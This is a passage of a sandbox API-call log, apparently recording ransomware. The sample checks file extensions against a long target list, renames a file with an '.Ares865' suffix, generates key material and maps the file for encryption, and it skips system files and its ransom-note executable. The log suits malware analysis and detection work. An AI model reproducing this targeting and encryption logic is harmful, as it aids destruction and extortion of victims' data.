(lpString="vmdk") returned 4 [0083.393] lstrcmpiW (lpString1=".hxn", lpString2="vmdk") returned -1 [0083.393] lstrlenW (lpString="rar") returned 3 [0083.393] lstrcmpiW (lpString1="hxn", lpString2="rar") returned -1 [0083.393] lstrlenW (lpString="zip") returned 3 [0083.393] lstrcmpiW (lpString1="hxn", lpString2="zip") returned -1 [0083.393] lstrlenW (lpString="tgz") returned 3 [0083.393] lstrcmpiW (lpString1="hxn", lpString2="tgz") returned -1 [0083.393] lstrlenW (lpString="vbox") returned 4 [0083.393] lstrcmpiW (lpString1=".hxn", lpString2="vbox") returned -1 [0083.393] lstrlenW (lpString="vdi") returned 3 [0083.393] lstrcmpiW (lpString1="hxn", lpString2="vdi") returned -1 [0083.393] lstrlenW (lpString="vhd") returned 3 [0083.393] lstrcmpiW (lpString1="hxn", lpString2="vhd") returned -1 [0083.393] lstrlenW (lpString="vhdx") returned 4 [0083.393] lstrcmpiW (lpString1=".hxn", lpString2="vhdx") returned -1 [0083.393] lstrlenW (lpString="avhd") returned 4 [0083.393] lstrcmpiW (lpString1=".hxn", lpString2="avhd") returned -1 [0083.393] lstrlenW (lpString="db") returned 2 [0083.393] lstrcmpiW (lpString1="xn", lpString2="db") returned 1 [0083.393] lstrlenW (lpString="db2") returned 3 [0083.393] lstrcmpiW (lpString1="hxn", lpString2="db2") returned 1 [0083.393] lstrlenW (lpString="db3") returned 3 [0083.393] lstrcmpiW (lpString1="hxn", lpString2="db3") returned 1 [0083.393] lstrlenW (lpString="dbf") returned 3 [0083.393] lstrcmpiW (lpString1="hxn", lpString2="dbf") returned 1 [0083.393] lstrlenW (lpString="mdf") returned 3 [0083.393] lstrcmpiW (lpString1="hxn", lpString2="mdf") returned -1 [0083.394] lstrlenW (lpString="mdb") returned 3 [0083.394] lstrcmpiW (lpString1="hxn", lpString2="mdb") returned -1 [0083.394] lstrlenW (lpString="sql") returned 3 [0083.394] lstrcmpiW (lpString1="hxn", lpString2="sql") returned -1 [0083.394] lstrlenW (lpString="sqlite") returned 6 [0083.394] lstrcmpiW (lpString1="33.hxn", lpString2="sqlite") returned -1 [0083.394] lstrlenW (lpString="sqlite3") returned 7 [0083.394] lstrcmpiW (lpString1="033.hxn", lpString2="sqlite3") returned -1 [0083.394] lstrlenW (lpString="sqlitedb") returned 8 [0083.394] lstrcmpiW (lpString1="1033.hxn", lpString2="sqlitedb") returned -1 [0083.394] lstrlenW (lpString="xml") returned 3 [0083.394] lstrcmpiW (lpString1="hxn", lpString2="xml") returned -1 [0083.394] lstrlenW (lpString="$er") returned 3 [0083.394] lstrcmpiW (lpString1="hxn", lpString2="$er") returned 1 [0083.394] lstrlenW (lpString="4dd") returned 3 [0083.394] lstrcmpiW (lpString1="hxn", lpString2="4dd") returned 1 [0083.394] lstrlenW (lpString="4dl") returned 3 [0083.394] lstrcmpiW (lpString1="hxn", lpString2="4dl") returned 1 [0083.394] lstrlenW (lpString="^^^") returned 3 [0083.394] lstrcmpiW (lpString1="hxn", lpString2="^^^") returned 1 [0083.394] lstrlenW (lpString="abs") returned 3 [0083.394] lstrcmpiW (lpString1="hxn", lpString2="abs") returned 1 [0083.394] lstrlenW (lpString="abx") returned 3 [0083.394] lstrcmpiW (lpString1="hxn", lpString2="abx") returned 1 [0083.394] lstrlenW (lpString="accdb") returned 5 [0083.394] lstrcmpiW (lpString1="3.hxn", lpString2="accdb") returned -1 [0083.394] lstrlenW (lpString="accdc") returned 5 [0083.394] lstrcmpiW (lpString1="3.hxn", lpString2="accdc") returned -1 [0083.394] lstrlenW (lpString="accde") returned 5 [0083.394] lstrcmpiW (lpString1="3.hxn", lpString2="accde") returned -1 [0083.394] lstrlenW (lpString="accdr") returned 5 [0083.394] lstrcmpiW (lpString1="3.hxn", lpString2="accdr") returned -1 [0083.394] lstrlenW (lpString="accdt") returned 5 [0083.394] lstrcmpiW (lpString1="3.hxn", lpString2="accdt") returned -1 [0083.394] lstrlenW (lpString="accdw") returned 5 [0083.394] lstrcmpiW (lpString1="3.hxn", lpString2="accdw") returned -1 [0083.394] lstrlenW (lpString="accft") returned 5 [0083.395] lstrcmpiW (lpString1="3.hxn", lpString2="accft") returned -1 [0083.395] lstrlenW (lpString="adb") returned 3 [0083.395] lstrcmpiW (lpString1="hxn", lpString2="adb") returned 1 [0083.395] lstrlenW (lpString="adb") returned 3 [0083.395] lstrcmpiW (lpString1="hxn", lpString2="adb") returned 1 [0083.395] lstrlenW (lpString="ade") returned 3 [0083.395] lstrcmpiW (lpString1="hxn", lpString2="ade") returned 1 [0083.395] lstrlenW (lpString="adf") returned 3 [0083.395] lstrcmpiW (lpString1="hxn", lpString2="adf") returned 1 [0083.395] lstrlenW (lpString="adn") returned 3 [0083.395] lstrcmpiW (lpString1="hxn", lpString2="adn") returned 1 [0083.395] lstrlenW (lpString="adp") returned 3 [0083.395] lstrcmpiW (lpString1="hxn", lpString2="adp") returned 1 [0083.395] lstrlenW (lpString="alf") returned 3 [0083.395] lstrcmpiW (lpString1="hxn", lpString2="alf") returned 1 [0083.395] lstrlenW (lpString="ask") returned 3 [0083.395] lstrcmpiW (lpString1="hxn", lpString2="ask") returned 1 [0083.395] lstrlenW (lpString="btr") returned 3 [0083.395] lstrcmpiW (lpString1="hxn", lpString2="btr") returned 1 [0083.395] lstrlenW (lpString="cat") returned 3 [0083.395] lstrcmpiW (lpString1="hxn", lpString2="cat") returned 1 [0083.395] lstrlenW (lpString="cdb") returned 3 [0083.395] lstrcmpiW (lpString1="hxn", lpString2="cdb") returned 1 [0083.395] lstrlenW (lpString="ckp") returned 3 [0083.395] lstrcmpiW (lpString1="hxn", lpString2="ckp") returned 1 [0083.395] lstrlenW (lpString="cma") returned 3 [0083.395] lstrcmpiW (lpString1="hxn", lpString2="cma") returned 1 [0083.395] lstrlenW (lpString="cpd") returned 3 [0083.395] lstrcmpiW (lpString1="hxn", lpString2="cpd") returned 1 [0083.395] lstrlenW (lpString="dacpac") returned 6 [0083.395] lstrcmpiW (lpString1="33.hxn", lpString2="dacpac") returned -1 [0083.395] lstrlenW (lpString="dad") returned 3 [0083.395] lstrcmpiW (lpString1="hxn", lpString2="dad") returned 1 [0083.395] lstrlenW (lpString="dadiagrams") returned 10 [0083.395] lstrcmpiW (lpString1="4.1033.hxn", lpString2="dadiagrams") returned -1 [0083.395] lstrlenW (lpString="daschema") returned 8 [0083.395] lstrcmpiW (lpString1="1033.hxn", lpString2="daschema") returned -1 [0083.395] lstrlenW (lpString="db-journal") returned 10 [0083.396] lstrcmpiW (lpString1="4.1033.hxn", lpString2="db-journal") returned -1 [0083.396] lstrlenW (lpString="db-shm") returned 6 [0083.396] lstrcmpiW (lpString1="33.hxn", lpString2="db-shm") returned -1 [0083.396] lstrlenW (lpString="db-wal") returned 6 [0083.396] lstrcmpiW (lpString1="33.hxn", lpString2="db-wal") returned -1 [0083.396] lstrlenW (lpString="dbc") returned 3 [0083.396] lstrcmpiW (lpString1="hxn", lpString2="dbc") returned 1 [0083.396] lstrlenW (lpString="dbs") returned 3 [0083.396] lstrcmpiW (lpString1="hxn", lpString2="dbs") returned 1 [0083.396] lstrlenW (lpString="dbt") returned 3 [0083.396] lstrcmpiW (lpString1="hxn", lpString2="dbt") returned 1 [0083.396] lstrlenW (lpString="dbv") returned 3 [0083.396] lstrcmpiW (lpString1="hxn", lpString2="dbv") returned 1 [0083.396] lstrlenW (lpString="dbx") returned 3 [0083.396] lstrcmpiW (lpString1="hxn", lpString2="dbx") returned 1 [0083.396] lstrlenW (lpString="dcb") returned 3 [0083.396] lstrcmpiW (lpString1="hxn", lpString2="dcb") returned 1 [0083.396] lstrlenW (lpString="dct") returned 3 [0083.396] lstrcmpiW (lpString1="hxn", lpString2="dct") returned 1 [0083.396] lstrlenW (lpString="dcx") returned 3 [0083.396] lstrcmpiW (lpString1="hxn", lpString2="dcx") returned 1 [0083.396] lstrlenW (lpString="ddl") returned 3 [0083.396] lstrcmpiW (lpString1="hxn", lpString2="ddl") returned 1 [0083.396] lstrlenW (lpString="dlis") returned 4 [0083.396] lstrcmpiW (lpString1=".hxn", lpString2="dlis") returned -1 [0083.396] lstrlenW (lpString="dp1") returned 3 [0083.396] lstrcmpiW (lpString1="hxn", lpString2="dp1") returned 1 [0083.396] lstrlenW (lpString="dqy") returned 3 [0083.396] lstrcmpiW (lpString1="hxn", lpString2="dqy") returned 1 [0083.396] lstrlenW (lpString="dsk") returned 3 [0083.396] lstrcmpiW (lpString1="hxn", lpString2="dsk") returned 1 [0083.396] lstrlenW (lpString="dsn") returned 3 [0083.396] lstrcmpiW (lpString1="hxn", lpString2="dsn") returned 1 [0083.396] lstrlenW (lpString="dtsx") returned 4 [0083.396] lstrcmpiW (lpString1=".hxn", lpString2="dtsx") returned -1 [0083.396] lstrlenW (lpString="dxl") returned 3 [0083.396] lstrcmpiW (lpString1="hxn", lpString2="dxl") returned 1 [0083.396] lstrlenW (lpString="eco") returned 3 [0083.397] lstrcmpiW (lpString1="hxn", lpString2="eco") returned 1 [0083.397] lstrlenW (lpString="ecx") returned 3 [0083.397] lstrcmpiW (lpString1="hxn", lpString2="ecx") returned 1 [0083.397] lstrlenW (lpString="edb") returned 3 [0083.397] lstrcmpiW (lpString1="hxn", lpString2="edb") returned 1 [0083.397] lstrlenW (lpString="epim") returned 4 [0083.397] lstrcmpiW (lpString1=".hxn", lpString2="epim") returned -1 [0083.397] lstrlenW (lpString="fcd") returned 3 [0083.397] lstrcmpiW (lpString1="hxn", lpString2="fcd") returned 1 [0083.397] lstrlenW (lpString="fdb") returned 3 [0083.397] lstrcmpiW (lpString1="hxn", lpString2="fdb") returned 1 [0083.397] lstrlenW (lpString="fic") returned 3 [0083.397] lstrcmpiW (lpString1="hxn", lpString2="fic") returned 1 [0083.397] lstrlenW (lpString="flexolibrary") returned 12 [0083.397] lstrcmpiW (lpString1=".14.1033.hxn", lpString2="flexolibrary") returned -1 [0083.397] lstrlenW (lpString="fm5") returned 3 [0083.397] lstrcmpiW (lpString1="hxn", lpString2="fm5") returned 1 [0083.397] lstrlenW (lpString="fmp") returned 3 [0083.397] lstrcmpiW (lpString1="hxn", lpString2="fmp") returned 1 [0083.397] lstrlenW (lpString="fmp12") returned 5 [0083.397] lstrcmpiW (lpString1="3.hxn", lpString2="fmp12") returned -1 [0083.397] lstrlenW (lpString="fmpsl") returned 5 [0083.397] lstrcmpiW (lpString1="3.hxn", lpString2="fmpsl") returned -1 [0083.397] lstrlenW (lpString="fol") returned 3 [0083.397] lstrcmpiW (lpString1="hxn", lpString2="fol") returned 1 [0083.397] lstrlenW (lpString="fp3") returned 3 [0083.397] lstrcmpiW (lpString1="hxn", lpString2="fp3") returned 1 [0083.397] lstrlenW (lpString="fp4") returned 3 [0083.397] lstrcmpiW (lpString1="hxn", lpString2="fp4") returned 1 [0083.397] lstrlenW (lpString="fp5") returned 3 [0083.397] lstrcmpiW (lpString1="hxn", lpString2="fp5") returned 1 [0083.397] lstrlenW (lpString="fp7") returned 3 [0083.397] lstrcmpiW (lpString1="hxn", lpString2="fp7") returned 1 [0083.397] lstrlenW (lpString="fpt") returned 3 [0083.397] lstrcmpiW (lpString1="hxn", lpString2="fpt") returned 1 [0083.397] lstrlenW (lpString="frm") returned 3 [0083.397] lstrcmpiW (lpString1="hxn", lpString2="frm") returned 1 [0083.397] lstrlenW (lpString="gdb") returned 3 [0083.398] lstrcmpiW (lpString1="hxn", lpString2="gdb") returned 1 [0083.398] lstrlenW (lpString="gdb") returned 3 [0083.398] lstrcmpiW (lpString1="hxn", lpString2="gdb") returned 1 [0083.398] lstrlenW (lpString="grdb") returned 4 [0083.398] lstrcmpiW (lpString1=".hxn", lpString2="grdb") returned -1 [0083.398] lstrlenW (lpString="gwi") returned 3 [0083.398] lstrcmpiW (lpString1="hxn", lpString2="gwi") returned 1 [0083.398] lstrlenW (lpString="hdb") returned 3 [0083.398] lstrcmpiW (lpString1="hxn", lpString2="hdb") returned 1 [0083.398] lstrlenW (lpString="his") returned 3 [0083.398] lstrcmpiW (lpString1="hxn", lpString2="his") returned 1 [0083.398] lstrlenW (lpString="ib") returned 2 [0083.398] lstrcmpiW (lpString1="xn", lpString2="ib") returned 1 [0083.398] lstrlenW (lpString="idb") returned 3 [0083.398] lstrcmpiW (lpString1="hxn", lpString2="idb") returned -1 [0083.398] lstrlenW (lpString="ihx") returned 3 [0083.398] lstrcmpiW (lpString1="hxn", lpString2="ihx") returned -1 [0083.398] lstrlenW (lpString="itdb") returned 4 [0083.398] lstrcmpiW (lpString1=".hxn", lpString2="itdb") returned -1 [0083.398] lstrlenW (lpString="itw") returned 3 [0083.398] lstrcmpiW (lpString1="hxn", lpString2="itw") returned -1 [0083.398] lstrlenW (lpString="jet") returned 3 [0083.398] lstrcmpiW (lpString1="hxn", lpString2="jet") returned -1 [0083.398] lstrlenW (lpString="jtx") returned 3 [0083.398] lstrcmpiW (lpString1="hxn", lpString2="jtx") returned -1 [0083.398] lstrlenW (lpString="kdb") returned 3 [0083.398] lstrcmpiW (lpString1="hxn", lpString2="kdb") returned -1 [0083.398] lstrlenW (lpString="kexi") returned 4 [0083.398] lstrcmpiW (lpString1=".hxn", lpString2="kexi") returned -1 [0083.398] lstrlenW (lpString="kexic") returned 5 [0083.398] lstrcmpiW (lpString1="3.hxn", lpString2="kexic") returned -1 [0083.398] lstrlenW (lpString="kexis") returned 5 [0083.398] lstrcmpiW (lpString1="3.hxn", lpString2="kexis") returned -1 [0083.398] lstrlenW (lpString="lgc") returned 3 [0083.398] lstrcmpiW (lpString1="hxn", lpString2="lgc") returned -1 [0083.398] lstrlenW (lpString="lwx") returned 3 [0083.398] lstrcmpiW (lpString1="hxn", lpString2="lwx") returned -1 [0083.399] lstrlenW (lpString="maf") returned 3 [0083.399] lstrcmpiW (lpString1="hxn", lpString2="maf") returned -1 [0083.399] lstrlenW (lpString="maq") returned 3 [0083.399] lstrcmpiW (lpString1="hxn", lpString2="maq") returned -1 [0083.399] lstrlenW (lpString="mar") returned 3 [0083.399] lstrcmpiW (lpString1="hxn", lpString2="mar") returned -1 [0083.399] lstrlenW (lpString="marshal") returned 7 [0083.399] lstrcmpiW (lpString1="033.hxn", lpString2="marshal") returned -1 [0083.399] lstrlenW (lpString="mas") returned 3 [0083.399] lstrcmpiW (lpString1="hxn", lpString2="mas") returned -1 [0083.399] lstrlenW (lpString="mav") returned 3 [0083.399] lstrcmpiW (lpString1="hxn", lpString2="mav") returned -1 [0083.399] lstrlenW (lpString="maw") returned 3 [0083.399] lstrcmpiW (lpString1="hxn", lpString2="maw") returned -1 [0083.399] lstrlenW (lpString="mdbhtml") returned 7 [0083.399] lstrcmpiW (lpString1="033.hxn", lpString2="mdbhtml") returned -1 [0083.399] lstrlenW (lpString="mdn") returned 3 [0083.399] lstrcmpiW (lpString1="hxn", lpString2="mdn") returned -1 [0083.399] lstrlenW (lpString="mdt") returned 3 [0083.399] lstrcmpiW (lpString1="hxn", lpString2="mdt") returned -1 [0083.399] lstrlenW (lpString="mfd") returned 3 [0083.399] lstrcmpiW (lpString1="hxn", lpString2="mfd") returned -1 [0083.399] lstrlenW (lpString="mpd") returned 3 [0083.399] lstrcmpiW (lpString1="hxn", lpString2="mpd") returned -1 [0083.399] lstrlenW (lpString="mrg") returned 3 [0083.399] lstrcmpiW (lpString1="hxn", lpString2="mrg") returned -1 [0083.399] lstrlenW (lpString="mud") returned 3 [0083.399] lstrcmpiW (lpString1="hxn", lpString2="mud") returned -1 [0083.399] lstrlenW (lpString="mwb") returned 3 [0083.399] lstrcmpiW (lpString1="hxn", lpString2="mwb") returned -1 [0083.399] lstrlenW (lpString="myd") returned 3 [0083.399] lstrcmpiW (lpString1="hxn", lpString2="myd") returned -1 [0083.399] lstrlenW (lpString="ndf") returned 3 [0083.399] lstrcmpiW (lpString1="hxn", lpString2="ndf") returned -1 [0083.399] lstrlenW (lpString="nnt") returned 3 [0083.399] lstrcmpiW (lpString1="hxn", lpString2="nnt") returned -1 [0083.399] lstrlenW (lpString="nrmlib") returned 6 [0083.400] lstrcmpiW (lpString1="33.hxn", lpString2="nrmlib") returned -1 [0083.400] lstrlenW (lpString="ns2") returned 3 [0083.400] lstrcmpiW (lpString1="hxn", lpString2="ns2") returned -1 [0083.400] lstrlenW (lpString="ns3") returned 3 [0083.400] lstrcmpiW (lpString1="hxn", lpString2="ns3") returned -1 [0083.400] lstrlenW (lpString="ns4") returned 3 [0083.400] lstrcmpiW (lpString1="hxn", lpString2="ns4") returned -1 [0083.400] lstrlenW (lpString="nsf") returned 3 [0083.400] lstrcmpiW (lpString1="hxn", lpString2="nsf") returned -1 [0083.400] lstrlenW (lpString="nv") returned 2 [0083.400] lstrcmpiW (lpString1="xn", lpString2="nv") returned 1 [0083.400] lstrlenW (lpString="nv2") returned 3 [0083.400] lstrcmpiW (lpString1="hxn", lpString2="nv2") returned -1 [0083.400] lstrlenW (lpString="nwdb") returned 4 [0083.400] lstrcmpiW (lpString1=".hxn", lpString2="nwdb") returned -1 [0083.400] lstrlenW (lpString="nyf") returned 3 [0083.400] lstrcmpiW (lpString1="hxn", lpString2="nyf") returned -1 [0083.400] lstrlenW (lpString="odb") returned 3 [0083.400] lstrcmpiW (lpString1="hxn", lpString2="odb") returned -1 [0083.400] lstrlenW (lpString="odb") returned 3 [0083.400] lstrcmpiW (lpString1="hxn", lpString2="odb") returned -1 [0083.400] lstrlenW (lpString="oqy") returned 3 [0083.400] lstrcmpiW (lpString1="hxn", lpString2="oqy") returned -1 [0083.400] lstrlenW (lpString="ora") returned 3 [0083.400] lstrcmpiW (lpString1="hxn", lpString2="ora") returned -1 [0083.400] lstrlenW (lpString="orx") returned 3 [0083.400] lstrcmpiW (lpString1="hxn", lpString2="orx") returned -1 [0083.400] lstrlenW (lpString="owc") returned 3 [0083.400] lstrcmpiW (lpString1="hxn", lpString2="owc") returned -1 [0083.400] lstrlenW (lpString="p96") returned 3 [0083.400] lstrcmpiW (lpString1="hxn", lpString2="p96") returned -1 [0083.400] lstrlenW (lpString="p97") returned 3 [0083.400] lstrcmpiW (lpString1="hxn", lpString2="p97") returned -1 [0083.400] lstrlenW (lpString="pan") returned 3 [0083.400] lstrcmpiW (lpString1="hxn", lpString2="pan") returned -1 [0083.400] lstrlenW (lpString="pdb") returned 3 [0083.400] lstrcmpiW (lpString1="hxn", lpString2="pdb") returned -1 [0083.400] lstrlenW (lpString="pdm") returned 3 [0083.401] lstrcmpiW (lpString1="hxn", lpString2="pdm") returned -1 [0083.401] lstrlenW (lpString="pnz") returned 3 [0083.401] lstrcmpiW (lpString1="hxn", lpString2="pnz") returned -1 [0083.401] lstrlenW (lpString="qry") returned 3 [0083.401] lstrcmpiW (lpString1="hxn", lpString2="qry") returned -1 [0083.401] lstrlenW (lpString="qvd") returned 3 [0083.401] lstrcmpiW (lpString1="hxn", lpString2="qvd") returned -1 [0083.401] lstrlenW (lpString="rbf") returned 3 [0083.401] lstrcmpiW (lpString1="hxn", lpString2="rbf") returned -1 [0083.401] lstrlenW (lpString="rctd") returned 4 [0083.401] lstrcmpiW (lpString1=".hxn", lpString2="rctd") returned -1 [0083.401] lstrlenW (lpString="rod") returned 3 [0083.401] lstrcmpiW (lpString1="hxn", lpString2="rod") returned -1 [0083.401] lstrlenW (lpString="rodx") returned 4 [0083.401] lstrcmpiW (lpString1=".hxn", lpString2="rodx") returned -1 [0083.401] lstrlenW (lpString="rpd") returned 3 [0083.401] lstrcmpiW (lpString1="hxn", lpString2="rpd") returned -1 [0083.401] lstrlenW (lpString="rsd") returned 3 [0083.401] lstrcmpiW (lpString1="hxn", lpString2="rsd") returned -1 [0083.401] lstrlenW (lpString="sas7bdat") returned 8 [0083.401] lstrcmpiW (lpString1="1033.hxn", lpString2="sas7bdat") returned -1 [0083.401] lstrlenW (lpString="sbf") returned 3 [0083.401] lstrcmpiW (lpString1="hxn", lpString2="sbf") returned -1 [0083.401] lstrlenW (lpString="scx") returned 3 [0083.401] lstrcmpiW (lpString1="hxn", lpString2="scx") returned -1 [0083.401] lstrlenW (lpString="sdb") returned 3 [0083.401] lstrcmpiW (lpString1="hxn", lpString2="sdb") returned -1 [0083.401] lstrlenW (lpString="sdc") returned 3 [0083.401] lstrcmpiW (lpString1="hxn", lpString2="sdc") returned -1 [0083.401] lstrlenW (lpString="sdf") returned 3 [0083.401] lstrcmpiW (lpString1="hxn", lpString2="sdf") returned -1 [0083.401] lstrlenW (lpString="sis") returned 3 [0083.401] lstrcmpiW (lpString1="hxn", lpString2="sis") returned -1 [0083.401] lstrlenW (lpString="spq") returned 3 [0083.401] lstrcmpiW (lpString1="hxn", lpString2="spq") returned -1 [0083.401] lstrlenW (lpString="te") returned 2 [0083.402] lstrcmpiW (lpString1="xn", lpString2="te") returned 1 [0083.402] lstrlenW (lpString="teacher") returned 7 [0083.402] lstrcmpiW (lpString1="033.hxn", lpString2="teacher") returned -1 [0083.402] lstrlenW (lpString="tmd") returned 3 [0083.402] lstrcmpiW (lpString1="hxn", lpString2="tmd") returned -1 [0083.402] lstrlenW (lpString="tps") returned 3 [0083.402] lstrcmpiW (lpString1="hxn", lpString2="tps") returned -1 [0083.402] lstrlenW (lpString="trc") returned 3 [0083.402] lstrcmpiW (lpString1="hxn", lpString2="trc") returned -1 [0083.402] lstrlenW (lpString="trc") returned 3 [0083.402] lstrcmpiW (lpString1="hxn", lpString2="trc") returned -1 [0083.402] lstrlenW (lpString="trm") returned 3 [0083.402] lstrcmpiW (lpString1="hxn", lpString2="trm") returned -1 [0083.402] lstrlenW (lpString="udb") returned 3 [0083.402] lstrcmpiW (lpString1="hxn", lpString2="udb") returned -1 [0083.402] lstrlenW (lpString="udl") returned 3 [0083.402] lstrcmpiW (lpString1="hxn", lpString2="udl") returned -1 [0083.402] lstrlenW (lpString="usr") returned 3 [0083.402] lstrcmpiW (lpString1="hxn", lpString2="usr") returned -1 [0083.402] lstrlenW (lpString="v12") returned 3 [0083.402] lstrcmpiW (lpString1="hxn", lpString2="v12") returned -1 [0083.402] lstrlenW (lpString="vis") returned 3 [0083.402] lstrcmpiW (lpString1="hxn", lpString2="vis") returned -1 [0083.402] lstrlenW (lpString="vpd") returned 3 [0083.402] lstrcmpiW (lpString1="hxn", lpString2="vpd") returned -1 [0083.402] lstrlenW (lpString="vvv") returned 3 [0083.402] lstrcmpiW (lpString1="hxn", lpString2="vvv") returned -1 [0083.402] lstrlenW (lpString="wdb") returned 3 [0083.402] lstrcmpiW (lpString1="hxn", lpString2="wdb") returned -1 [0083.402] lstrlenW (lpString="wmdb") returned 4 [0083.402] lstrcmpiW (lpString1=".hxn", lpString2="wmdb") returned -1 [0083.402] lstrlenW (lpString="wrk") returned 3 [0083.402] lstrcmpiW (lpString1="hxn", lpString2="wrk") returned -1 [0083.402] lstrlenW (lpString="xdb") returned 3 [0083.402] lstrcmpiW (lpString1="hxn", lpString2="xdb") returned -1 [0083.402] lstrlenW (lpString="xld") returned 3 [0083.402] lstrcmpiW (lpString1="hxn", lpString2="xld") returned -1 [0083.403] lstrlenW (lpString="xmlff") returned 5 [0083.403] lstrcmpiW (lpString1="3.hxn", lpString2="xmlff") returned -1 [0083.403] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.Ares865") returned 63 [0083.403] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.403] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.404] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=332) returned 1 [0083.404] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.404] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.404] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.404] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.405] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.405] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.405] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x450, lpName=0x0) returned 0x15c [0083.408] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x450) returned 0x190000 [0083.409] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.410] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.410] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.410] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.410] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.410] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.410] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.410] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.410] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.410] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0083.410] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.410] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0083.410] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.410] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.410] CloseHandle (hObject=0x15c) returned 1 [0083.410] CloseHandle (hObject=0x118) returned 1 [0083.410] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.411] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.411] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.411] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x113ae4d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x113ae4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x11446a50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.INFOPATH.14.1033.hxn", cAlternateFileName="MSINFO~1.HXN")) returned 1 [0083.411] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.411] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="aoldtz.exe") returned 1 [0083.411] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2=".") returned 1 [0083.411] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="..") returned 1 [0083.411] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="windows") returned -1 [0083.411] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="bootmgr") returned 1 [0083.411] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="temp") returned -1 [0083.411] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="pagefile.sys") returned -1 [0083.411] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="boot") returned 1 [0083.411] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="ids.txt") returned 1 [0083.411] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0083.411] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", 